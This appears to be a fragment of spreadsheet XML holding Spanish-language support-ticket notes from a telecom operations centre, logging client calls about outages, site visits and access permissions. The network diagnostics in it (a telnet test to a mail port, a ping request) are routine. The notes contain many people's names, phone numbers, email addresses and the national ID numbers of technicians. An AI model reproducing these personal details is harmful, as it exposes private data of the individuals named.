    <t>SE LLAMÓ/HABLÓ CON GERARDO COHETERO/CLIENTE 00 525551745299 INDICA QUE NO TIENEN GESTIÓN DE LOS EQUIPOS Y ESTÁN AÚN A ESPERA DE RESPUESTA DE SU CLIENTE FINAL, PIDE SE LE LLAME MAÑANA A LAS 10:00AM PARA SEGUIMIENTO.
HAY SEGUIMIENTO VÍA CORREO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 00 525551745299 CONTESTA LA SEÑORITA  ILEANA RAMOS INDICA QUE AUN NO TIENEN RESPUESTA DEL CLIENTE FINAL QUE CUANDO TENGAN RESPUESTA ELLOS NOS ESTARAN CONFIRMANDO**
ID 3001368301
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 3001330760</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 00 525551745299  CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO LA RETOMAN ||
 SE INTENTARA LUEGO**
ID 3001310411
**</t>
  </si>
  <si>
    <t>F4583271</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERARDO FLAMENCO 77261041 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 3001148578</t>
  </si>
  <si>
    <t>SE LLKAMA A CLIENT GERARDO FLAMENCO-77261041 SE TIENE ENL INEA-
3001013428
COLA:
NOMBRE: A: 0050377261041
NÚMERO: 0050377261041
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 0050377261041
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 10:22:41</t>
  </si>
  <si>
    <t>F4583288</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN GONZALEZ AL 50941506 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001023233
**</t>
  </si>
  <si>
    <t>F4583290</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 57107177 MENCIONA QUE ESTE NUMERO ESTE NUMERO NO ES DE LLANTAS VITATRAC
-ID 3001009661</t>
  </si>
  <si>
    <t>F4583292</t>
  </si>
  <si>
    <t>CLIENTE DANILO PUERTO 50494679411 COMENTA QUE REALIZARÁ PRUEBAS CON EL SERVICIO, SOLICITA SE LE LLAME EN 30 MINUTOS. ID: 3001055099</t>
  </si>
  <si>
    <t>SE LE INFORMA A CLIENE DANILO PUERTO 50494679411 PARA SEGUIMIENTO DEL CASO, SE LE INFORMA ACERCA DE LA SOLICITUD DEL REINICIO DE EQUIPOS, CLIENTE INDICA QUE PREFIERE QUE SE ENVÍE PERSONAL TÉCNICO AL SITIO A REVISAR. ID DE LLAMADA: 3001264439</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE DANILO PUERTO 50494679411 QUIEN COMENTA QUE NO SE ENCUENTRA EN LAS INSTALACIONES, INDICA QUE EL TEMA DE TEMPERATURA AÚN ESTA PENDIENTE DE REPARACIÓN, INDICA QUE YA GESTIONARON EL CAMBIO DE EQUIPO DE AIRE ACONDICIONADO YA QUE ESTÁ FALLANDO. SE LE SOLICITA AL CLIENTE UBICAR Y REINICIAR EL EQUIPO IMC PERO INDICA QUE SE LE HAGA LA SOLICITUD VIA CORREO. ID DE LLAMADA: 3001026762</t>
  </si>
  <si>
    <t>SE LLAM A CLIENTE DANILO  PUERTO 25574350 EXT. 63524 NO SE LOGRA LA COMUNICACION IVR INDICA QUE EL NUMERO TIENE DAÑO EN LA LINEA
-ID 3001023807</t>
  </si>
  <si>
    <t>F4583304</t>
  </si>
  <si>
    <t>SE LLAMA A JOSUE HERRERA +50670136426 MENCIONA QUE YA OBSERVA EL SERVICIO FUNCIONANDO BIEN PERO SOLICITA DE NUEVO LLAMADA PARA LAS 12:00 HRS CONFIRMAR EL FUNCIONAMIENTO
-ID 3001543717</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE HERRERA AL 50670136426 INDICA QUE AUN VE PERDIDAS EN EL SERVICIO || SE NOTIFICA A GESTOR PARA EL SEGUIMIENTO **
ID 3001030729
**</t>
  </si>
  <si>
    <t>###SE LE INFORMA A JOSUE HERRERA QUE QUEDAMOS A LA ESPERA DEL CLIENTE INDIQUE LA HORA DEL CAMBIO POR VIA SKYPE###</t>
  </si>
  <si>
    <t>###SE INFORMA A IVAN ARRAZOLA PARA QUE LLEGUE A LAS 19:00 PM AL SITIO DEL CLIENTE###
3001376947
COLA:
NOMBRE: A: 58262797
NÚMERO: 58262797
DURACIÓN: 0:03:14
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58262797
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 31/05/2022 13:18:58
###SE LLAMA AL CLIENTE DEL PR VALERIO PARA INFORMAR VISITA A LAS 19:00 PM
3001377935
COLA:
NOMBRE: A: 41737649
NÚMERO: 41737649
DURACIÓN: 0:01:16
ESTADO: CONECTADA
DETALLES: 41737649
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 31/05/2022 13:19:02</t>
  </si>
  <si>
    <t>SE RECIBE RESPUESTA DE CLEINTE JOSUE HERRERA, CLIENTE SOLICITA VISITA EL DIA DE MAÑANA A LAS 9:00 AM, ESTAR PUNTUALES.</t>
  </si>
  <si>
    <t>SE LLAMA A JOSUE HERRERA 50670136426 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001623540</t>
  </si>
  <si>
    <t>F4583305</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUMBERTO /88554438 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001025742</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIEL AL 82381701 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 3001321318
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HUMBERTO AL 88554438 INDICA QUE NO ESTA EN OFICINA QUE SE LE LLAME AL SEÑOR
GABRIEL 82381701 **
ID 3001300186
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIEL AL 82381701 || SE CONTACTA A CLIENTE Y SE DEJA EN CONFERENCIA CON GESTOR **
ID 3001301665
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  HUMBERTO /88554438 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
CLIENTE SOLICITA SE PUEDA REALIZAR PING A LA IP 192.168.13.1
-ID 3001034644</t>
  </si>
  <si>
    <t>F4583315</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENEYDA DELGADO 63006794 MENCIONA QUE PERSISTE EL INCONVENIENTE SE LE BRINDA EL DIAGNOSTICO
CLIENTE SOLICITA SE COMPARTA EL DIAGNOSTICO POR CORREO
 MARIAENEIDA.DELGADO@ENERLANDGROUP.COM
-ID 3001046817</t>
  </si>
  <si>
    <t>F4583316</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. LUIS RODRIGUEZ 70691721 INFORMA QUE AUN NO HA LLEGADO AL SITIO REMOTO POR EL TRAFICO VEHICULAR, ESTIMA LLEGAR EN 30 MINS. ID: 3001466349.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LUIS RODRIGUEZ 78843777 MENCIONA QUE O SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA EN 1 HORA
-ID 2001976621</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RODRIGUEZ 78843777 MENCIONA QUE SE ENCUENTRA OCUPADO POR LO QUE SOLICITA LLAMADA EN 15 MIN APROX
-ID 2001971805</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. LUIS RODRIGUEZ 70691721 ACTUALMENTE EN LLAMADA ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. LUIS RODRIGUEZ 23939601 NO SE LOGRA COMUNICACION ID: 3001420449.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. LUIS RODRIGUEZ 78843777  NO SE LOGRA COMUNICACION ID: 3001419633.</t>
  </si>
  <si>
    <t>SR. LUIS RODRIGUEZ 70691721 INFORMA QUE NO TIENEN ACCESO A CIERTAS IP PUBLICAS LAS CUALES LAS TIENEN ASIGNADAS UN SERVIDOR DE CORREOS Y DE MONITOREO CON OTRO PROVEEDOR, INFORMA QUE NO SE LOGRA ACCEDER AL SERVIDOR DE CORREOS, SE REALIZA LA PRUEBA Y SI PERMITE ABRIR TELNET CON PUERTO 25, SE LE INFORMA Y COMENTA QUE ESTARA REVISANDO HOY A LAS 5PM PARA QUE LE REGRESEMOS LA LLAMADA.
ID1398004#TELNET 190.150.7.152 25 /SOURCE-INTERFACE FASTETHERNET 0/1
TRYING 190.150.7.152, 25 ... OPEN
220 MAIL.SEDI.COM.SV ESMTP POSTFIX (UBUNTU)</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. LUIS RODRIGUEZ 78843777  NO CONTESTO, ID: CALL ID: 3001024815</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RODRIGUEZ 78843777 SE TRATA DE SOLICITAR DATOS PARA VISITA, CLIENTE MENCIONA QUE EL SERVICIO ESTA ACTIVO PERO NO TIENE ACCESO A ALGUNOS SITIOS, SE SOLICITA A CLIENTE MAYOR INFORMACION DEL  REPORTE PERO INDICA QUE NO ESCUCHA BIEN EL AUDIO
CLIENTE ESTA SOLICITANDO SE PUEDA ENVIAR POR CORREO LA INFORMACION DEL DIAGNOSTICO
LUIS@SEDI.COM.SV
-ID 3001056123</t>
  </si>
  <si>
    <t>F4583317</t>
  </si>
  <si>
    <t>CLIENTE LOCALIZA CISCO DE ROUTER LO APAGA--- SE VALIDA QUE CAE DESDE GESTOR--</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A PR PERO OPERADORA INDICA LINEAS SE ENCUENTRAN OCUPADAS---</t>
  </si>
  <si>
    <t>TT INSOP F4583490 SE TIENE PROBLEMAS CON VPN NO SE PUEDE ACCEDER A LOS EQUIPOS---
NO SE PUEDE VALIDAR SI SERVICIO RESTABLECIO O SI SE ENCUENTRA CAIDO...</t>
  </si>
  <si>
    <t>F4583323</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001151092</t>
  </si>
  <si>
    <t>F4583328</t>
  </si>
  <si>
    <t>NO HAY SEGUIMIENTO POR PARTE DE CNOC CLARO, EN SU MOMENTO SE NOTIFICÓ VÍA SKYPE AL GRUPO, CON SIGUIENTE CRONO:
30/05/2022 15:46:34 GUATEMALA/CENTRO AMERICA (CASTILLO.ENRIQUE):
SE LLAMÓ/HABLÓ CON JOSUÉ PÉREZCENTRAL 1755 EXT 10557 PARA QUE NOS BRINDE TELS DE PR; ME BRINDA 24264900 EXT 43535/43540, EN EL PRIMER TEL CONTESTA KAREN GODOY/PR PIDE SE LLAME AL TEL 40501439 CON BREMEN ENRÍQUEZ EN UNOS 25/30 MINUTOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 30 DE MAYO DE 2022 10:41
PARA: ROSA_SANCHEZ@BANTRAB.NET.GT &lt;ROSA_SANCHEZ@BANTRAB.NET.GT&gt;; CARLO_BORJA@BANTRAB.NET.GT &lt;CARLO_BORJA@BANTRAB.NET.GT&gt;; MONITORTI@BANTRAB.NET.GT &lt;MONITORTI@BANTRAB.NET.GT&gt;; REDESTI@BANTRAB.NET.GT &lt;REDESTI@BANTRAB.NET.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL SITIO: CC_BANTRAB_GT_AGENCIA_17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3328
ID: 42700429T
IDENTIFICADOR DEL CLIENTE: CC_BANTRAB_GT_AGENCIA_176
UBICADO EN: BARRIO SAN SEBASTIAN FRENTE AL PARQUE DE SAN AGUSTIN ACASAGUASTLAN EL PROGRESO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4583330</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ALIDA MARTINEZ AL 30162972 NO RESPONDE, SE INTENTARA LUEGO **
-ID 3001120853
**</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A RODOLFO VALLECILLO/PR 505 77203817 PARA QUE EXPLIQUE DETALLES DE LO REPORTADO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA ESAÚ SANDOVAL/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ASTRID HERNÁNDEZ/EJECUTIVA CLARO SE LE BRINDA EL NÚMERO DE TICKET Y SE LE INDICA QUE ENLACE OK, NO HEMOS LOGRADO COMUNICACIÓN CON CLIENTE PARA DETALLES DE LO QUE REPORTA, EJECUTIVA ME TIENE EN LÍNEA.</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, RODOLF VALLECILLO, CONSULTA SOBRE LAS IP DISPONIBLES PARA UTILIZAR E INDICA QUE TIENE FIREWALL DAÑADO, SOLICITA SE EL DEJE EN MONITOREO HASTA EL DIA MIERCOLES 1 DE JUNIO A LAS 12 HORAS.
NÚMERO: 7753
FIN: HOY, 17:07
ID DE LLAMADA: 3001164011</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30162972 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001153379</t>
  </si>
  <si>
    <t>VALIDANDO LO DICHO EN CRONO ANTERIOR, EJECUTIVA INDICA QUE POR LA HORA SE DEBE LLAMAR A PR, ME BRINDA LOS TELS 505 77203817 O 505 58707251 RVALLECILLO@DICHTER-NEIRA.COM
SE LE INDICA QUE SE DARÁ SEGUIMIENTO CON CLIENTE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODOLFO VALLECILLO 505 77203817 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001668430</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALIDA MARTINEZ NO RESPONDE, SE INTENTARA LUEGO
-ID 3001667867</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALIDA MARTINEZ 30168739 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001064991</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30162972 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001115075</t>
  </si>
  <si>
    <t>F4583352</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE DIEGO CABRERA SOLICITA AVANCES, SE VALIDA QUE SE ENVIARON PRUEBAS POR CORREO YA QUE EL SERVICIO ESTA UP, CLIENTE INDICA QUE ÉL ESTA HACIENDO PRUEBAS Y OBSERVA PERDIDAS DE PAQUETES Y DESEA HACER PRUEBAS EN CONJUNTO CON LA PERSONA QUE ESTA HACIENDO LAS REVISIONES, SE CONTACTA A GESTOR JAIMEJ.HERNANDEZ Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>F4583360</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE INDICANDO QUE DEBEN DE GESTIONAR ACCESOS OCN EL CC, PENDIENTE A QUE ELLOS CONFIRMEN POR CORREO LA AUTORIZACION DE ACCESOS
ASUNTO: | IP2033098SV || BANCO DAVIVIENDA SALVADORENO S.A.
BUENAS TARDES.
VAMOS A AVERIGUAR SI TENEMOS CONTACTO PARA GESTIONAR CON EL CC, YA QUE GENERALMENTE SOLO SOLICITAMOS PERMISOS CON NUESTRO CLIENTE, EN ESTE CASO EL  LOCAL DE MR DONUT, PERO NO CON EL CC EN SU TOTALIDAD.
QUEDAMOS PENDIENTE DE INDICARLES SI ES POSIBLE REALIZAR EL PERMISO DE NUESTRO LADO.
GRACIAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS FUENTES AL 25562637  NO RESPONDE || SE INTENTARA LUEGO **
ID 3001949871
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LUIS FUENTES 25562637 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001915145 - 3001915744</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS FUENTES 25562637 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001924034</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS FUENTES AL 25562637   INDICA QUE SE REVISE EN PLANTA EXTERNA Y SI ES NECESARIO LLEGAR AL SITIO QUE SE PROGRAME VISITA SE LE INDICA QUE LOS ACCESOS SON PARA EL CENTRO COMERCIAL INDICA QUE LOS ESTARA SOLICITANDO Y NOS ENVIARA EL CORREO CON FECHA Y HORA QUE INDIQUE EL CENTRO COMERCIAL**
ID 3001044736  - 3001046342
**</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 16:59
PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; LUIS A FUENTES &lt;LUIS.A.FUENTES@DAVIVIENDA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: RE: | IP2033098SV || BANCO DAVIVIENDA SALVADORENO S.A.
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4583365</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS A CLIENTE ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 13:53
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CARLOS JAVIER GAVARRETE GARCIA &lt;CARLOS.GAVARRETE@FICOHSA.COM&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CENTRO DE MONITOREO &lt;HNB-NOC@FICOHSA.COM&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;
ASUNTO: RE: CAIDO DATOS, AGN LA COLONIA, JUTICALPA
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, SOLICITAMOS DE SU APOYO EN PODER GESTIONAR ACCESOS PARA EL PERSONAL TÉCNICO QUE SE DESCRIBE A CONTINUACIÓN:
ELVIN JOSUE RODRÍGUEZ DURON             0801-1998-08494
FRANKLIN ALEJANDRO MEZA RODRIGUEZ 1801-1996-06969
NUSLY GABRIELA MONTES CERNA             1501-1998-00272
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GAVARRETE AL 97326405 INDICA QUE YA CUENTA CON LOS ACCESOS PERO LA AGENCIA AUN NO ESTA ABIERTA QUE HAY QUE ESPERAR QUE ABRAN Y QUE EL ESTARA ENVIANDO CORREO CON LA HORA PARA QUE EL PERSONAL TECNICO PUEDA PRESENTARSE**
ID 3001260387
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GAVARRETE AL 504) 2239-6410 EXT. 2310 CONTESTA LA SEÑORITA PAOLA QUIEN INDICA QUE EL SEÑOR CARLOS AUN NO SE ENCUENTRA Y BRINDA NUMERO DE TELEFONO 97326405 **
ID 3001259580
**</t>
  </si>
  <si>
    <t>*** SE TIENE CONFIRMACIÓN DE PARTE DE CLIENTE DE AUTORIZADOS LOS ACCESOS A LA AGENCIA. LA CUAL APERTURA A LAS 10H ***
*** NOTA: CONTACTO DE CLIENTE EN SITIO: MINDA FRANCO 3185 2946 ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 8:26
PARA: CARLOS JAVIER GAVARRETE GARCIA &lt;CARLOS.GAVARRETE@FICOHSA.COM&gt;
CC: ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CENTRO DE MONITOREO &lt;HNB-NOC@FICOHSA.COM&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;
ASUNTO: RE: CAIDO DATOS, AGN LA COLONIA, JUTICALPA
ESTIMADO BUEN DÍA,
CON GUSTO SE PROCEDERÁ CON LA VISITA A LAS 10H. SE NOTIFICARÁ AL PERSONAL TÉCNICO.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.
DE: CARLOS JAVIER GAVARRETE GARCIA &lt;CARLOS.GAVARRETE@FICOHSA.COM&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 8:23
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
CC: ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CENTRO DE MONITOREO &lt;HNB-NOC@FICOHSA.COM&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;
ASUNTO: RE: CAIDO DATOS, AGN LA COLONIA, JUTICALPA
BUEN DÌA,
ANGEL, TEAM CLARO, YA TENEMOS APROBADO EL ACCESO A LA AGENCIA, LA AGENCIA ABRE A PARTIR DE LAS 10:00 AM PARA QUE LLEGUEN A PARTIR DE ESA HORA
PUEDEN CONTACTAR A MINDA FRANCO 3185 2946 QUIEN LES APOYARA CON EL INGRESO A LA AGENCIA
SALUDOS</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE RESPUESTA.
RE: CAIDO DATOS, AGN LA COLONIA, JUTICALPA</t>
  </si>
  <si>
    <t>DE: ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 18:21
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CARLOS JAVIER GAVARRETE GARCIA &lt;CARLOS.GAVARRETE@FICOHSA.COM&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
CC: RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CENTRO DE MONITOREO &lt;HNB-NOC@FICOHSA.COM&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;
ASUNTO: RE: CAIDO DATOS, AGN LA COLONIA, JUTICALPA
BUENAS TARDES ESTIMADOS;
UN GUSTO SALUDARLES, EN SEGUIMIENTO AL CASO SD1130336, LES INFORMAMOS QUE DEBIDO A HORA DE CIERRE DE AGENCIA SE CONTINUARÁ CON REVISIÓN DE EQUIPOS POR PARTE DEL PERSONAL TÉCNICO EL DÍA DE MAÑANA 31/05/2022, A LA ESPERA DE HABERLES INFORMADO.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4583368</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE PACAY 55547708  MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO, SE VALIDARA CON GESTOR
-ID 3001050861
NOMBRE DEL CLIENTE: AGRO COMERCIALIZADORA DEL POLOCHIC S.A.
UBICACIÓN: KILOMETRO 200 RUTA NACIONAL 7E TUCURU ALTA VERAPAZ
HORARIO DE ATENCION:8:00 - 17:00
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO - JOSE.TAROTT@SOMOSCMI.COM
CLIENTE MENCIONA QUE PARA QUE TECNICO PUEDA INGRESAR SE NECESITA UNA CHARLA POR LO QUE CLIENTE SOLICITA SSE PUEDA ASIGNAR AL MISMO TECNICO QUE YA TIENE CONOCIEMIENTO DE LA CHARLA</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL SOLICITANDO NUEVO CONTACTO SI FUESE POSIBLE YA QUE EL ACTUAL ENVIA A BUZON--
RE: REPORTE DE SERVICIO SANTA TERESA</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A PR SIN EMBARGO ENVIA A BUZON--</t>
  </si>
  <si>
    <t>F4583370</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA MONTERROSO-35695817 MENCIONA QUE EL PROVEEDOR DE LA PBX ESTARA LLEGANDO A PR A VALIDAR SUS EQUIPOS
CLIENTE MENCIONA QUE AL TENER ALGUN AVANCE SE ESTARA CONTACTANDO POR MEDIO DE CC
-ID 3001102145</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SILVIA MONTERROSO-35695817  - SE TIENE EN LINEA-
3001026161
COLA:
NOMBRE: A: 35695817
NÚMERO: 35695817
DURACIÓN: 0:00:40
ESTADO: CONECTADA
DETALLES: 35695817
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 10:54:38</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO TIENE LLAMADAS ENTRANTES, SALIENTES NI ENTRE EXTENSIONES. + COMENTA QUE YA RESETO SU PBX PERO AUN NO RESTABELCE EL SERVICIO, SE LE COMENTA QUE ANIVEL DE CLARO TODO OK + QUE ESE PROBLEMA ES DIRECTAMENTE CON LA PBX, POR LO QUE SE LE RECOMIENDA ESCAALAR DIRECTAMENTE CONS U PROVEEDOR ##CLIENTE INDICA QUE ESCALARA + QUE SE LE MARQUE EN 1 HORA PARA VER SI SOLO ASI PUDO APERTURAR TICKET DE SOPORTE CON EL PROVEEDOR DE LA PBX O SI ELLOS EXIGEN CERTIFICACION, ANTES DE ABRIR TICKET QUE SU PROVEEDOR ##SE MARCARA EN 1 HORA ##</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE VALIDA EL SERVICIO CON EL CLIENTE CLAUDIA MONTERROSO.
3001148041
COLA:
NOMBRE: A: 66716700
NÚMERO: 66716700
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 66716700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 16:32:57</t>
  </si>
  <si>
